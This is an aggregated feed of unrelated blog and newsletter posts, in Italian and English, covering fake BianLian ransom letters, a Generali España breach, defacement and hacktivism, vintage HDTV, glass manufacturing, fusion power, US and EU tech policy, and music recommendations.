Negli Stati Uniti è stata individuata una nuova frode: i criminali inviano false richieste di riscatto via posta per conto del gruppo BianLian.

Le buste indicano che il mittente è “BIANLIAN GROUP” e che l’indirizzo del mittente è un edificio per uffici a Boston, Massachusetts. Le lettere venivano inviate ai dirigenti aziendali e recavano la dicitura “Urgente, leggere immediatamente”. Secondo i timbri postali, la spedizione è avvenuta il 25 febbraio 2025 dall’ufficio postale di Boston.

Il contenuto delle lettere è focalizzato sul campo di attività del destinatario. Le lettere inviate alle organizzazioni sanitarie affermano che i dati dei pazienti e dei dipendenti sono stati rubati e le aziende che gestiscono gli ordini dei clienti sono minacciate relativamente alla divulgazione di informazioni sensibili dei clienti.

Nel testo si sostiene che gli aggressori hanno ottenuto l’accesso ai sistemi aziendali e hanno presumibilmente rubato file riservati, tra cui bilanci, documenti fiscali e dati personali dei dipendenti.
Contenuto della lettera per una delle aziende (Guidepoint Security)
A differenza delle reali richieste di BianLian, le lettere affermano che non ci saranno ulteriori trattative con le vittime e danno loro 10 giorni di tempo per pagare il riscatto in Bitcoin.

Ogni lettera contiene un codice QR Code e un indirizzo di portafoglio Bitcoin per trasferire importi da 250.000 dollari a 500.000. Per le aziende mediche l’importo fisso è pari a 350.000 dollari.
Indirizzi wallet per il trasferimento di fondi in una lettera falsa (BleepingComputer)
Alcune e-mail contengono vere e proprie perdite di password per aumentare la credibilità minacce. Tuttavia, gli esperti non hanno trovato prove di veri e propri attacchi informatici. Secondo gli esperti di GuidePoint Security, le lettere non hanno alcun collegamento con il gruppo BianLian e rappresentano semplicemente un tentativo di intimidire i dirigenti aziendali affinché trasferiscano denaro ai truffatori.

Sebbene le e-mail non rappresentino una minaccia immediata, i reparti IT e di sicurezza dovrebbero avvisare i propri manager della nuova truffa. Questi messaggi sono un’evoluzione delle truffe un tempo diffuse tramite posta elettronica, ma ora prendono di mira i dirigenti di grandi aziende.

Intanto i rappresentanti del vero gruppo BianLian non hanno rilasciato dichiarazioni.

L'articolo Ora il Ransomware arriva per posta ordinaria! L’innovazione si firma Bianlian. Scopri i retroscena proviene da il blog della sicurezza informatica.

Take a look at this video from [Reely Interesting], showing scenes from traditional Japanese festivals. It’s well filmed, and as with any HD video, you can see real detail. But as you watch, you may see something a little out of the ordinary. It’s got noise, a little bit of distortion, and looking closely at the surroundings, it’s clearly from the 1980s. Something doesn’t add up, as surely we’d expect a video like this to be shot in glorious 525 line NTSC. In fact, what we’re seeing is a very rare demo reel from 1985, and it’s showing off the first commercial HDTV system. This is analogue video in 1035i, and its background as listed below the video makes for a very interesting story.

Most of us think of HDTV arriving some time in the 2000s when Blu-ray and digital broadcasting supplanted the NTSC or PAL systems. But in fact the Japanese companies had been experimenting since the 1960s, and these recordings are their first fruits. It’s been digitized from a very rare still-working Sony HDV-1000 reel-to-reel video recorder, and is thus possibly the oldest HD video viewable online. They’re looking for any HDV-1000 parts, should you happen to have one lying around. Meanwhile, the tape represents a fascinating window into a broadcast history very few of us had a chance to see back in the day.

This isn’t the first time we’ve touched on vintage reel-to-reel video.

youtube.com/embed/2vybIQ5o1yQ?…

hackaday.com/2025/03/05/is-thi…

Humans have been chemically modifying their world for far longer than you might think. Long before they had the slightest idea of what was happening chemically, they were turning clay into bricks, making cement from limestone, and figuring out how to mix metals in just the right proportions to make useful new alloys like bronze. The chemical principles behind all this could wait; there was a world to build, after all.

Among these early feats of chemical happenstance was the discovery that glass could be made from simple sand. The earliest glass, likely accidentally created by a big fire on a sandy surface, probably wasn’t good for much besides decorations. It wouldn’t have taken long to realize that this stuff was fantastically useful, both as a building material and a tool, and that a pinch of this and a little of that could greatly affect its properties. The chemistry of glass has been finely tuned since those early experiments, and the process has been scaled up to incredible proportions, enough to make glass production one of the largest chemical industries in the world today.

Sand++

When most of us use the word “glass,” we’ve got a pretty clear mental picture of what the term refers to. But from a solid-state chemistry viewpoint, glass means more than the stuff that fills the holes in your walls or makes up that beer bottle in your hand. Glasses, or more correctly glassy solids, are a class of amorphous solids that undergo a glass transition. Unpacking that, amorphous refers to the internal structure of the material, which lacks the long-range structural regularity characteristic of a crystalline solid. Long range in this context is a relative term, and refers to distances of more than a few nanometers.

As for the glass transition bit, that simply refers to the material changing from a brittle, hard solid state to a viscous liquid as it is heated past its glass transition temperature. Coupled together, these properties mean that many materials can be glassy solids, including plastics and metals. For our purposes, though, glass refers to glassy solids made primarily of silicates, with other materials added to change the properties of the finished material.

To understand the amorphous structure of glass, we need to look at the starting material for manufacturing glass: quartz. Quartz is a crystalline solid made from silicon dioxide (SiO₂), or silica. Inside the crystal, each silicon atom is bonded to four oxygen atoms, each of which forms a bridge to a neighboring silicon. This results in a tetrahedral unit cell, giving both natural and synthetic quartz many of their useful properties.

When quartz sand is ground up finely and heated above its melting point of 1,700C, the rigidly ordered crystal structure is disrupted and a thick, syrupy liquid forms. Cooling that liquid slowly would allow the crystal structure to reform, with the silicon atoms connected by a regular grid of bridging oxygen atoms. Glass production, though, uses faster cooling, which makes it harder for all the oxygen atoms to form bridges between the silicon atoms. The result is a disrupted pattern, with some silicon atoms bonded to four oxygens and some bonded to only two or three. This disrupts the long-range ordering seen in the original quartz crystals and results in the properties we normally associate with glassy solids, such as brittleness, low electrical conductivity, and a high melting temperature.
The crystal structure of silicates is disrupted by sodium, calcium, and aluminum, lowering the melting point and viscosity of soda-lime glass. Source: Mrmw, CC0.
Glass made from pure silica sand is called fused quartz, and while it’s commercially valuable, especially in situations requiring extreme temperature resistance and transparency over a wide range of the optical spectrum, it also has some drawbacks. First, the extreme temperatures needed to melt pure quartz sand require a lot of energy, making fused quartz expensive to produce in bulk. Also, the liquid glass is extremely viscous, making it difficult.

Luckily, these properties can be altered by adding a few impurities to the melt. Adding about 13% sodium oxide (Na₂O), 10% calcium oxide (CaO), and a percent or so of aluminum oxide (Al₂O₃) dramatically changes the physical and chemical properties of the mix. The sodium oxide generally comes from sodium carbonate (Na₂CO₃), which is known as soda, and the calcium carbonate comes from lime, which is limestone that has been heated. Together, the sodium and the calcium bind to some of the oxygen atoms in the silicates, blocking them from bridging to other silicates. This further disrupts any long-range interactions, lowering the melting point of the mix and decreasing its viscosity. The result is soda-lime glass, which accounts for about 90% of the 130 million tonnes of glass manufactured each year.

If You Can’t Stand the Heat…

Soda-lime glass is used for everything from food and beverage containers to window glass, with only slight adjustments to the mix of impurities to match the properties of the finished glass to the job. But if there’s one place where plain soda-lime glass falls short, it’s resistance to thermal shock. Thanks to the disruption of long-range interactions between silicates by sodium and calcium, soda-lime glass has a much higher coefficient of thermal expansion (CTE) than fused silica. This makes heating soda-lime glass risky, since the stress caused by expansion or contraction can cause the glass to shatter.

To lower the CTE of soda-lime glass, a small amount of boron trioxide (BO₃) is added to the melt. The boron atoms bind to two oxygen atoms, which forms a bridge between adjacent silicates, albeit slightly longer than an oxygen-only bridge. This would seem to raise the CTE, but boron has another trick up its sleeve. Boron normally only accepts three bonds, but in the presence of alkali metals like sodium, it will accept one more. That means the sodium atoms will bond to the boron, keeping them from blocking more bridging oxygens. The result is borosilicate glass, which has a viscosity low enough to ease manufacturing and a low CTE to withstand thermal shock.

Borosilicate glass has been around for more than a century, most recognizably under the trade name Pyrex. It quickly became a fixture in kitchens around the world as the miracle cookware that could go from refrigerator to oven without shattering. Sadly, Corning no longer sells borosilicate glass cookware in the North American market, opting to sell tempered soda-lime glassware under the Pyrex brand since about 1998. True borosilicate Pyrex glass is most limited to the laboratory and industrial market now, although Pyrex cookware is still available in Europe.

The Glassworks

In a way, glass is a bit like electricity, which is largely consumed the instant it’s produced since there aren’t many practical ways to store it at a grid scale. Similarly, glass really can’t be manufactured and stored in bulk the way other materials like aluminum and steel can, and shipping tankers of molten glass from one factory to another is a practical impossibility. So a glasswork generally has a complete manufacturing process under one roof, with raw materials coming in one end and finished products going out the other. This also makes glassworks very large facilities, especially ones that make float glass.

Another way in which glass manufacturing is similar to electric generation is that both are generally continuous processes. Large base load generators are most efficient when they are kept rotating continuously, and spinning them up from a standing start is a long and tedious process. Similarly, glass furnaces, which are often classified by the number of metric tons of melt they can supply per day, can take days or weeks to get up to working temperature. That means the entire glass factory has to be geared around keeping the furnace fed with raw material and ensuring the output is formed into finished products immediately and continuously.

On the supply side of the glassworks is the batch house, which serves as a warehouse for raw material. Sand, soda, lime, and other bulk ingredients arrive by truck or rail and are stored in silos or piled onto the batch house floor. It’s vitally important that the raw ingredients stay clean and dry; the results of a wet mix being dumped into a furnace full of 1,500° molten glass don’t bear thinking. An important raw material is cullet, which is broken glass either from recycling or from the production process; adding cullet to the mix reduces the energy needed to melt the batch. Ingredients are weighed and mixed in the batch house and transported by conveyors to the dog house, an area directly adjacent to the inlet of the furnace where the mix is prewarmed to remove any remaining moisture before being pushed into the furnace by a pusher arm.

The furnace is made from refractory bricks and usually has a long and broad but fairly shallow pool covered by an arched roof. Most furnaces are heated with natural gas, although some electric arc furnaces are used. The furnace often has two zones, the melting tank and the working tank, which are separated by a wall with narrow openings. The temperatures of the two chambers are maintained at different levels, with the melting tank generally hotter than the working tank. The working tank also sometimes has chlorine gas bubbled through it to consolidate any impurities into a slag that floats to the surface of the melt, where it can be skimmed off and added to the cullet in the batch house.

youtube.com/embed/1HDWJgFLCfA?…

Float, Blow, Press, Repeat

After the furnace, the liquid glass enters the cold end of the glassworks. This is a relative term, of course, since the glass is still incandescent at this point. How it exits the furnace and is formed depends on the finished product. For sheet glass such as architectural glass, the float process is generally used. Liquid glass exiting the furnace is floated on top of a pool of molten tin, which is denser than the glass. The liquid glass spreads out over the surface of the tin, forming wide sheets of perfectly flat glass. The thickness and width of the sheet can be controlled by rollers at the edge of the tin pool, which grab the glass sheet and pull it along.

Float baths can be up to four meters wide and 50 meters or more long, over which length the temperature is gradually reduced from about 1,100° to 600°. At that point, the glass rolls off the tin bath onto rollers and enters a long annealing oven called a lehr, which drops the temperature over 100 meters or more before the sheets are cut. The edges, which were dimpled by the rollers in the float bath, are cut off by scoring with diamond wheels and snapping with rollers, with the off-cuts added to the cullet in the batch house. The glass ribbon is cut to length by a scoring wheel set at an angle matched to the speed of the conveyor to make straight scores across the sheet and snapped by a conveyor belt that raises up at just the right time to snap the sheet.

Float glass often goes through additional post-processing modifications, such as tempering. While it’s still quite hot, float glass can be rapidly cooled with jets of air from above and below. This creates thin layers on both faces that have solidified while the core of the sheet is still fluid, putting the faces into tension relative to the core, which is in compression. This dramatically toughens the glass compared to plain annealed glass, and when it does break, the opposed forces within the glass force it to shatter into small fragments rather than large shards.

For hollow glass products, the arrangement of the cold end forming machines is a bit different. Rather than flowing horizontally out of the furnace, melted glass drops through holes in the bottom of the tank. Large shears close at intervals to cut the stream of molten glass into precisely sized pieces called gobs, which drop into curved chutes. The chutes rotate to direct the gobs into an automatic molding machine.

Molding something like a bottle is a multistage process, with gobs first formed into a rough hollow shape called a parison. The parison can be formed either by pressing the gob into an upside-down mold with a plunger to form a cavity, or by blowing compressed air into the mold from below. Either way, the parisons are flipped rightside-up by the molding machine and moved to a second mold, where the final shape of the bottle is formed by compressed air before being pushed onto a conveyor that takes the bottles to an annealing lehr. The entire process from furnace to formed bottle only takes a few seconds, and never stops.

youtube.com/embed/EL3gy4G0gcY?…

Some glass hollowware products, such as pie plates, baking dishes, and laboratory beakers, do not need to be blown at all. Rather, these are press molded by dropping gob directly into one half of a mold and pressing it with a matching mold. The mold halves squeeze the molten glass into its final shape before the mold opens and the formed item is whisked away for annealing

No matter what the final form of the glass being produced, the degree of coordination required to keep a glass factory running smoothly is pretty amazing. The speed with which ingredients are added to the furnace has to match the speed of finished products being taken off the line at the end, and temperatures have to be rigidly controlled all along the way. Also, all the machinery has to be engineered to withstand lava-like temperatures without breaking down; imagine the mess that would result if a furnace broke down with a couple of tonnes of molten glass in it. Also, molding machines have to deal with the fact that molds only last a few shifts before they need to be resurfaced, lest imperfections creep into the finished products. This means taking individual molding stations out of service while the rest stay in production, all while maintaining overall throughput.

hackaday.com/2025/03/05/big-ch…

Generali España, filiale del gruppo assicurativo Assicurazioni Generali S.p.A., ha subito un accesso non autorizzato ai propri sistemi informatici. La notizia è stata diffusa da VenariX en Español, una piattaforma che monitora le minacce informatiche.

Generali, tra le più grandi compagnie assicurative al mondo, è presente in Spagna con una vasta gamma di prodotti assicurativi e finanziari. Secondo quanto riportato, la società sta lavorando per mitigare i rischi e proteggere i dati sensibili dei clienti. Non sono stati ancora diffusi dettagli su eventuali conseguenze o furti di informazioni.

Questo è quanto riportato all’interno della print screen presente nel tweet di VenariX: “siamo costretti a informarla che abbiamo rilevato un incidente di sicurezza informatica presso Generali Seguros y Reaseguros, S.A.IJ., che ha portato una terza parte ad accedere al nostro Sistema Informativo, sostituendo le credenziali di un utente autorizzato, e ha causato l’esposizione di parte delle informazioni relative alla polizza auto da lei sottoscritta e che conserviamo dal momento della sottoscrizione della polizza in conformità ai nostri obblighi legali e contrattuali.”

Ennesimo attacco alla supply chain

Pertanto, l’incidente si configura come un attacco alla supply chain, ovvero un attacco che prende di mira non solo un’azienda specifica, ma anche i suoi fornitori, partner e sistemi interconnessi. La supply chain rappresenta l’intero ecosistema di servizi, software e infrastrutture che un’organizzazione utilizza per operare. Colpire un singolo anello della catena può generare un effetto domino, compromettendo più soggetti e amplificando l’impatto della violazione.

La direttiva NIS2, adottata dall’Unione Europea, mira proprio a rafforzare la sicurezza della supply chain imponendo obblighi più stringenti per le aziende considerate “essenziali” e “importanti”. Tra le novità introdotte, vi sono requisiti di gestione del rischio più severi, maggiore responsabilità per i dirigenti e una sorveglianza rafforzata sugli incidenti che coinvolgono fornitori terzi.

Per proteggersi da questi attacchi, le aziende devono adottare una strategia di cyber resilience basata su tre pilastri: verifica rigorosa dei fornitori, monitoraggio continuo delle reti e implementazione di misure di sicurezza avanzate come la segmentazione della rete e l’adozione di soluzioni zero trust. Solo attraverso un approccio proattivo è possibile ridurre i rischi e mitigare gli effetti di eventuali violazioni.

Generali Spagna

Presente in Spagna dal 1834, GENERALI è uno dei principali attori del mercato assicurativo spagnolo. L’azienda conta circa 2.000 dipendenti e una delle reti di consulenti più grandi del Paese, con oltre 1.600 uffici di assistenza clienti e 10.000 professionisti.

GENERALI focalizza la propria strategia sull’offerta di un’esperienza eccellente ai propri clienti. Per raggiungere questo obiettivo, ha sviluppato il progetto pionieristico di sondaggi denominato TNPS, attraverso il quale ogni anno vengono effettuati più di 900.000 sondaggi per conoscere l’opinione dei clienti. Grazie alle informazioni raccolte, l’azienda è in grado di migliorare costantemente i propri processi e la qualità del servizio offerto.

Nel suo impegno verso l’innovazione come leva di crescita, GENERALI mette a disposizione dei propri clienti prodotti e servizi telematici all’avanguardia e spazi di gestione privati ​​come My GENERALI. Tutti questi sviluppi soddisfano i più elevati standard di usabilità, in modo che i clienti e i canali di distribuzione possano svolgere qualsiasi tipo di procedura in modo rapido e semplice.

Questo articolo è stato redatto attraverso l’utilizzo della piattaforma Recorded Future, partner strategico di Red Hot Cyber e leader nell’intelligence sulle minacce informatiche, che fornisce analisi avanzate per identificare e contrastare le attività malevole nel cyberspazio.

L'articolo Attacco Informatico a Generali España. Ancora un attacco alla Supply Chain proviene da il blog della sicurezza informatica.

Vorrei condividere con voi tre canzoni che porto nel cuore da più o meno tempo ma che ritengo assai interessanti e che forse nell'italia di oggi mancano di essere conosciute perché non molto condivise sui social ma abbastanza conosciute nel resto del mondo e apprezzate davveeo tanto. Ritengo che mancano ancora tanto artisti di questo livello in italia e che spesso manca l'ascolto dalle persone distratte da tutto questo intrattenimento e ci vorrebbe una pausa per l'ascolto, pausa che è sostanzialmente la stessa concezione che danno anche i buddisti/mindfuless ed affini quando si dovrebbe parlare di vita, prezenza, di ascolto di se stessi e del corpo/cuore.

Ho parlato/scritto troppo, vi lascio alle tre canzoni da ca(r)pire da soli, vado via! *sciò*

- Delilah Montagu - Version Of Me -

(canzone riflessiva su chi si è veramente e cosa si comunica davvero se stessi della stessa artista di cui fred again ha campionato la sua voce per un suo pezzo molto famoso)

youtube.com/watch?v=wema_tYrK3…

- Regina Spektor - Loveology -

(consiglio l'ascolto in cuffia con bassissime aspettative arrivando al finale che vi stupirà di sicuro...non demordete che è un pezzo davvero incredibile che ho in loop da ore)

youtube.com/watch?v=lHaetZ-Vu8…

- Raphael Treza - We Are One -

(soundtrack favolosa con un testo poetico fantastico di un documentario di raphael treza trovabile facilmente free su youtube)
(raphaeltreza.com/)

youtube.com/watch?v=kSSlt7Uf_K…

ANOTHER WEEK, ANOTHER DIGITAL POLITICS. I'm Mark Scott, and will be in Washington next week — come say hello at an event I'm co-hosting on March 11 with Katie Harbath (and her excellent Anchor Change newsletter.)

I'll also be in Geneva on March 24 for a discussion on tech sovereignty and data governance (sign up here) and will be co-hosting another tech policy gathering in London on March 27 (sign up for more upcoming details here.)

— Under the Trump 2.0 administration, tech policy is now inextricably tied to trade and foreign policy. That's not so different than from before.

— The European Commission is reassessing its focus on digital regulation. That change is almost exclusively down to internal, not external, pressures.

— Artificial intelligence companies are in an arms race to sign up as many publishers worldwide to feed their large language models.

Let's get started:

Washington: same message, different delivery

AFTER DONALD TRUMP'S MEETING WITH Volodymyr Zelenskyy in the Oval Office last week, tech policy is certainly not at the top of anyone's agenda when it comes to souring transatlantic relations. But as I get ready for a week in North America (Washington: March 10-12; Montréal: March 13-14), it's time to unpack what the first six weeks of the new Trump administration means, both for America and the rest of the world, when it comes to digital.

At first glance, there appears to be a significant shift. In repeated White House executive orders, directives and policy decisions, the US president has signaled his dislike for greater checks on (American) tech companies. Gone is United States support for the global tax revamp, negotiated by the Organization for Economic Cooperation and Development (OECD). Gone is the support for greater content moderation on social media platforms — and the rise of threats if other countries follow that path. Gone is Washington's support for checks on artificial intelligence, including parts of an White House executive order from a Joe Biden-era. Gone is support for TikTok's ban within the US — a policy that Trump championed during his first term.

Taken as a whole, it feels like a upending of Washington's consensus that technology firms needed to be reined in; that cooperation with like-minded allies helped promote US economic interests; and that pushing back against foreign adversaries, in the online world, was a national security priority.

And yet, I'm not so sure.

It's sometimes easy to forget how past administrations acted when a new White House resident has his feet under the table. Dating back to Barack Obama's time in charge, consecutive US presidents have repeatedly pushed back against greater checks — from non-US countries — even when they promoted potential curbs at home. Obama, for instance, famously chided members of the European Parliament when they suggested that Google should be broken up. Let's leave aside the fact those lawmakers didn't have such powers. But fast forward a decade, and the European Union has never realistically considered forcing the split of these tech giants. But do you know who has? The US Department of Justice and its ongoing antitrust lawsuit against Alphabet and its dominance over search.

Let's look at other examples. Both Trump 1.0 and Biden's administrations, collectively, were never that excited about revamping the world's global tax regime — mostly because it would allow others to levy taxes against US tech firms. Washington would still come out net positive under those proposals, based on OECD calculations, as the US would earn additional revenue from taxing non-American firms, too. But the idea that pesky foreigners would impose levies on some of the most prominent US companies was something that garnered bipartisan anger.

Thanks for reading the free version of Digital Politics. Paid subscribers receive at least one newsletter a week. If that sounds like your jam, please sign up here.

Here's what paid subscribers read in February:
— How changing geopolitics affects platform governance, digital competition, internet governance, trade and data protection. More here
— What happens when the US doesn't follow the game plan in combating 'hybrid warfare?;' What lessons to take from the Paris AI Action Summit?; Fact-checkers underpin crowdsourced 'community notes.' More here.
— Germany's federal election is reminder we don't know what happens on social media; The first transatlantic fight over digital won't come around social media rules; What the global tax overhaul would have meant for tech. More here.
— In the wake of the German election, we shouldn't claim 'mission accomplished' when it comes to fighting foreign interference. More here.

I can go on. Yes, the Trump administration has a longstanding opinion that all forms of online safety/content moderation regulation represent an illegitimate attack on free speech. I would disagree with that assessment, but that is the current White House's starting point. And yes, current US officials are open about their willingness to use trade sanctions against regions/countries (the EU and United Kingdom have been specifically name-checked for attention) that impose such regimes that Trump 2.0 believes represent unfair trading practices against US firms.

But as someone who had a front row seat to the crafting of the EU's Digital Services Act, I remember well that the former Biden administration equally pushed back hard against what it similarly believed was unfair practices from Brussels primarily targeted at Silicon Valley. Yes, these officials did it mostly behind closed doors and in support of some tech firms. But the message — while not as vocal or transactional as the current White House — was clear: these content moderation rules are bad, and the EU should cut it out.

Where I do get confused is how part of the Trump 2.0 team appears to be copying, almost word for word, the transparency and accountability parts of international online safety regimes. The same rules, it should be pointed out, that allegedly represent a fundamental threat to people's free speech. The US Federal Trade Commission's recent request for information "regarding technology platform censorship," for instance, includes language around how these firms made their content moderation decisions that would not be out of place in European-style legislation.

"Did the policies or other public-facing representations describe how, when, or under what circumstances the platform would deny or degrade users’ access to its services?," one of the FTC question asks. "Did the platform offer a meaningful opportunity to challenge or appeal adverse actions that deny, or degrade users’ access, consistent with its users’ reasonable expectations based on its representations?," says another. Those questions are equally at the center of what non-US officials want to understand, too.

I get the public differences between how Trump 2.0 and previous administrations have approached these issues. And on other aspects — particularly in relation to artificial intelligence and short-term equality issues on datasets — there are significant differences.

But when I peel back the rhetoric and look at the underlying policies, what are the differences in how the current White House approaches digital compared to its predecessors? In officials like Michael Kratsios, director of the White House Office of Science and Technology Policy, and Gail Slater, the new head of the US Department of Justice's antitrust division, Trump 2.0 has picked well-qualified policymakers that aren't that different from who was in charge, only months ago, during Biden's time in charge.

One group I haven't mentioned is lawmakers in Congress. Sigh. The US House of Representatives and Senate certainly like to talk a good game on digital policy. (Anyone remember Chuck Schumer's AI Insight forums?) But I remain skeptical about any form of tech legislation making its way through Congress — mostly because it's not a high priority in the current political climate.

Some officials talk about renewed impetus for federal privacy rules (I've heard that before.) Others say more targeted legislation around online kids safety could win bipartisan support. Again, I have doubts.

But, if you take the recent US Inflation Reduction Act and US Chips Act — and their impact on the American domestic tech industry, as whole — then the view of Congress doesn't look too bad. Yes, the future of some of that legislation is in jeopardy under Trump 2.0. But, combined, the laws doubled down on US tech investment; provided federal subsidies to entice companies to spend locally; and positioned the country on a favorable footing in the increasingly geopolitical world that encompasses tech in 2025.

To me, that feels like a pretty familiar pitch no matter who currently resides in the White House.

Chart of the Week

TO COMPETE IN THE CUT-THROAT AI RACE, companies are rushing to pen deals with some of the largest newsletters and media outlets in the world.

The goal? To feed these firms' large language models with high-quality content that can make sophisticated systems more lifelike when they respond to real-world queries.

For publishers, it's a race for survival. Many have argued that AI companies have already scraped their sites — and the New York Times has sued OpenAI and Microsoft. But for others, these tech companies offer a new revenue opportunity to keep their legacy media businesses afloat.
Source: Ezra Eeman — which publishers have signed partnerships with individual AI firms

Brussels: different message, same delivery

CONVENTIONAL WISDOMS DICTATES that Brussels is firing on all cylinders. The EU has its shiny online safety rules (the Digital Services Act) and digital antitrust legislation (the Digital Markets Act), as well as the upcoming Artificial Intelligence Act — the world's first comprehensive rulebook for the emerging technology. In Ursula von der Leyen, the returning German head of the European Commission, the EU's executive branch, the 27-country bloc has a leader who helped pass those rules. Now, she's ready to wield them aggressively.

That is outdated thinking.

Yes, the EU is in the midst of implementing new digital rules, many of which have never been tested before. The Digital Markets Act's shift to ex ante oversight, or allowing regulators to determine where market abuse may happen before it occurs, is a significant departure from decades of competition jurisprudence, for instance. The Digital Services Act's transparency and accountability provisions for social media companies and search engines — that do not require platforms to remove legal content, to be clear — are being watched by other countries eager to follow that approach.

And yet, the political and economic winds have significantly shifted in Brussels.

For now, let's leave aside the increasingly fraught relationship between the EU and US after decades of close ties. Within the bloc, ongoing sluggish economic output and a failure to capture the next generation of technology advances by European firms have fundamentally altered how EU officials now approach questions around digital policymaking. At the center of that switch is last year's report from Mario Draghi, the former head of the European Central Bank. In his analysis, the ex-Italian prime blamed overburdensome regulation — including the AI Act and the EU's General Data Protection Regulation, or comprehensive privacy regime — for hamstringing the bloc's economy compared to international rivals.

That ethos has taken hold at the top of the European Commission. I would disagree that all regulation/legislation leads to poor economic outcomes, especially in the digital space. Personally, a lack of coordination EU-wide capital markets and a failure to create a "digital single market" across the 27 countries is more to blame for Europe's lack of tech champions. For me, generations of tech regulation is a secondary issue when, say, a Swedish startup founder can not easily reach out to an Italian investor to back her company to sell into a unified online market from Finland to Greece. But hey, I'm not a former head of the European Central Bank.

This 'de-regulate at all costs!' mantra is now playing out in how Brussels approaches digital. When I saw Henna Virkkunen, the newly-appointed European Commission executive vice president in charge of tech, at the Paris AI Action Summit, the Finnish politician wanted to talk about the EU's Apply AI Strategy and AI Factories initiative — policies aimed at using public funds to jumpstart European companies' use of the emerging technology. In her 10 minute speech, I counted at least 10 references to "innovation," and only a couple of mentions of "regulation." It's not a perfect metaphor for what's happening. But it's pretty close.

Sign up for Digital Politics

Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.

Subscribe
Email sent! Check your inbox to complete your signup.

No spam. Unsubscribe anytime.

To a degree, this makes sense. The EU's economy remains sluggish, and Brussels can't realistically compete with Beijing and Washington on the global stage if it doesn't have a homegrown tech industry. That goes for everything from AI startups to industrial champions making electric vehicles. All the best (or worst?) digital rules in the world don't matter if non-EU countries look at how that legislation hasn't helped local businesses, and say 'no thanks.' Caveat: such legislation is also about protecting citizens' from harm, but I digress.

This change of focus — where even returning EU officials who helped to craft these rules in the previous European Commission's tenure are shifting their policymaking approach — will inevitably have an impact on how digital rules are created.

Already, Brussels has shelved its so-called AI Liability Directive over concerns it would harm growth. I have questions about how future investigations, under the Digital Services Act and Digital Markets Act, will be pushed if such probes signal to all countries (both EU and non-EU) that the bloc isn't open for business. The AI Act's full implementation is still about 18 months away, and I equally question what resources will be provided to make sure those rules are effective given the change in political priorities at the top of the European Commission.

Much of this nuance is getting lost in the EU-US diplomatic spat over Washington's aversion to Brussels' regulatory rulebook. European fears over American retaliatory tariffs are certainly worrying many within the EU — both inside the so-called Brussels Bubble and across national capitals.

But it's the 180-degree internally-focused turn within the 27-country bloc that's driving the wider change in the EU's mood music around digital regulation.

No, the existing rules aren't going away — and will lead to likely enforcement actions against (some) American firms, given the ongoing probes into Meta, Alphabet and X, among others. Yet the era of 'let them have more digital rules!' is over within the EU. And that shift is coming from within, not from outside.

What I'm reading

— The geopolitical race on AI is fundamentally reshaping international data flows and leading to regulatory fragmentation, argue Christopher Kuner and Gabriela Zanfir-Fortuna for the Future of Privacy Forum.

— Japan approved new AI legislation that represents a so-called 'light touch' approach to the technology, and will require companies to voluntarily cooperate with Tokyo's safety measures. More here and here.

— The European Union and India held their second Trade and Technology Council meeting in New Delhi on Feb 28. Here are the outcomes.

— OpenAI updated its analysis on how malign actors were using its technology for 'malicious uses.' More here.

— The European Fact-Checking Standards Network condemned a recent police raid on its Serbian member organization Istinomer.rs. More here.

digitalpolitics.co/newsletter0…

C'era una volta un filo d'argento, sottile e lucente, che giaceva silenzioso in un angolo del laboratorio. Non era un filo come tanti, era un filo speciale, scelto con cura per la sua purezza e la sua capacità di catturare la luce. Un filo che aspettava di prendere vita, di trasformarsi in qualcosa di unico e prezioso.

Specifiche e curiosità 👇

solaraartigianatoartistico.wor…

Things are heating up in the world of nuclear fusion research, with most fundamental issues resolved and an increasing rate of announcements being made regarding commercial fusion power. China’s CNNC is one of the most recent voices here, with their statement that they expect to have commercial nuclear fusion plants online by 2050. Although scarce on details, China is one of the leading nations when it comes to nuclear fusion research, with multiple large tokamaks, including the HL-2M and the upcoming CFETR which we covered a few years ago.
Stellaris stellarator. (Credit: Proxima Fusion)
In addition to China’s fusion-related news, a German startup called Proxima Fusion announced their Stellaris commercial fusion plant design concept, with a targeted grid connection by the 2030s. Of note is that this involves a stellarator design, which has the major advantage of inherent plasma stability, dodging the confinement mode and Greenwald density issues that plague tokamaks. The Stellaris design is an evolution of the famous Wendelstein 7-X research stellarator at the Max Planck Institute.

While Wendelstein 7-X was not designed to produce power, it features everything from the complex coiled design and cooled divertors plus demonstrated long-term operation that a commercial reactor would need. This makes it quite likely that the coming decades we’ll be seeing the end spurt for commercial fusion power, with conceivably stellarators being the unlikely winner long before tokamaks cross the finish line.

hackaday.com/2025/03/05/china-…

Negli ultimi anni, il fenomeno del defacement di siti web ha subito un’evoluzione significativa. Se un tempo rappresentava principalmente una forma di protesta digitale da parte di gruppi hacktivisti, oggi si intreccia sempre più con la guerra psicologica, informatica e le operazioni di disinformazione.

Il defacement, o “deface”, consiste nella modifica non autorizzata di una pagina web, spesso per trasmettere messaggi politici, ideologici o propagandistici. Ma quali sono le dinamiche dietro questi attacchi?

E quali implicazioni hanno nell’attuale contesto geopolitico?

Il defacement: un’arma dell’hacktivismo

L’hacktivismo (in inglese hacktivims che nasce dall’unione di “hacking” ed “Attivism”), ha utilizzato il defacement come strumento di protesta sin dagli anni ’90. Gruppi come Anonymous e LulzSec hanno spesso attaccato siti governativi e aziendali per denunciare corruzione, censura e violazioni dei diritti umani. Questo tipo di attacco ha il vantaggio di essere visibile e di avere un forte impatto mediatico senza necessariamente causare danni permanenti ai sistemi informatici.

Un esempio storico è il deface della NASA del 2013, quando gli hacktivisti modificarono le pagine ufficiali cdel sito dell’agenzia spaziale statunitense. Tuttavia, l’hacktivismo basato sui deface è spesso criticato per la sua inefficacia a lungo termine: sebbene possa attirare l’attenzione su determinate cause, raramente porta a cambiamenti concreti.
Deface del 2013 della NASA da parte del Master Italian Hackers Team che a seguito delle indagini venne scoperto di essere stato eseguito da un hacker italiano.
L’invasione russa dell’Ucraina ha visto un’escalation senza precedenti di attività di hacktivismo, con numerosi gruppi schieratisi a sostegno di una delle due fazioni. Da un lato, gruppi pro-Russia come Killnet e Noname057(16) hanno condotto attacchi DDoS su larga scala contro infrastrutture critiche e siti governativi occidentali, cercando di destabilizzare la rete informatica dei loro avversari. Dall’altro, attori filo-ucraini, tra cui alcuni affiliati ad Anonymous, hanno risposto con attacchi mirati a siti russi, spesso utilizzando il defacement per diffondere messaggi contro il Cremlino e minare la propaganda di Mosca.

